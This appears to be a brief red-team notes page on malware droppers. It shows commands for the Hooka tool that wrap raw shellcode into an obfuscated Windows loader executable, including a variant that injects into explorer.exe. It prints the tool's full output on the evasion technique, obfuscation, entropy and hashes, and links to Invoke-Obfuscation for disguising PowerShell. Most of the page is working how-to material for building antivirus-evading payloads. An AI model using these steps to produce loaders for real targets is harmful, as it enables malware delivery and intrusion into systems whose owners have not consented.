Important
Use open source malware droppers when playing in testing environments… You don’t want to burn your own dropper when playing around.
Hooka
- Can be run in Linux and generate Windows binaries (cross platform compilation)
- Golang
# simplest command
./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe
# the more shit you add the buggier it might be... and less likely to run
# glhf
./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe --proc explorer.exe
_ _ _ _
| | | | ___ ___ | | __ __ _ | |
| |_| | / _ \ / _ \ | |/ / / _` | | |
| _ | | (_) | | (_) | | < | (_| | |_|
|_| |_| \___/ \___/ |_|\_\ \__,_| (_)
[*] Obtaining shellcode from /home/lo/webserver/smb.x64.bin
> Shellcode is in raw format
[*] Defining evasion techniques...
[*] Using suspendedprocess technique to execute shellcode
[*] Obfuscating variables and functions...
[*] Compiling shellcode loader...
> Payload format is set to EXE
> go build -o imdone.exe loader.go
> 3154432 bytes written to imdone.exe
[+] Loader file entropy: 6.9330213473661955
[+] Checksums:
> MD5: 6666b187280d31537b083c69631b636c
> SHA1: 64ff907b7c9d94564ce5857145dd70d8b4761044
> SHA256: d9b5fc90dcd569ae2f00b7dc7bb1ddeae28e1cacc201628afa7d809061dfe561
[+] Shellcode loader has been successfully generatedInvoke-Obfuscation
- https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
- https://github.com/danielbohannon/Invoke-Obfuscation
- https://x.com/dmcxblue/status/1879176230098157962?t=bhHdazl7dNhn39P3g5jVpw&s=19